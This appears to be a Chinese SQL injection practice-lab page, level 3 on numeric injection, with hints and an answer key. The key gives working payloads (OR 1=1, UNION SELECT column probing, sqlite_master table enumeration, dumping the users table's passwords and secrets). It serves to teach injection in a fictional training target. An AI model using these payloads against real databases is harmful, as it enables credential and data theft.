🐱 SQL 注入练习靶场

墨璃出品 · 仅供学习 · 靶场数据均为虚构

关卡3:数字型注入

按 id 查询,注意这次没有引号包裹:
SELECT * FROM users WHERE id = 你的输入
试试 1 OR 1=1,或者联合注入爆出全部字段。另外试试爆出其它表?
💡 提示
1. 1 OR 1=1 全表返回
2. 1 UNION SELECT 1,2,3,4,5,6 测列数
3. 用 group_concat 爆表名:1 UNION SELECT 1,2,3,4,5,(SELECT group_concat(name) FROM sqlite_master WHERE type='table')
📝 答案
1 UNION SELECT 1,2,3,4,5,(SELECT group_concat(name) FROM sqlite_master WHERE type='table') --

会看到表名 users 和 secret_table。
然后爆 secret_table 内容:1 UNION SELECT 1,2,3,4,5,(SELECT group_concat(info) FROM secret_table) --
或者直接爆 users 的 secret:1 UNION SELECT id,username,password,nickname,email,secret FROM users --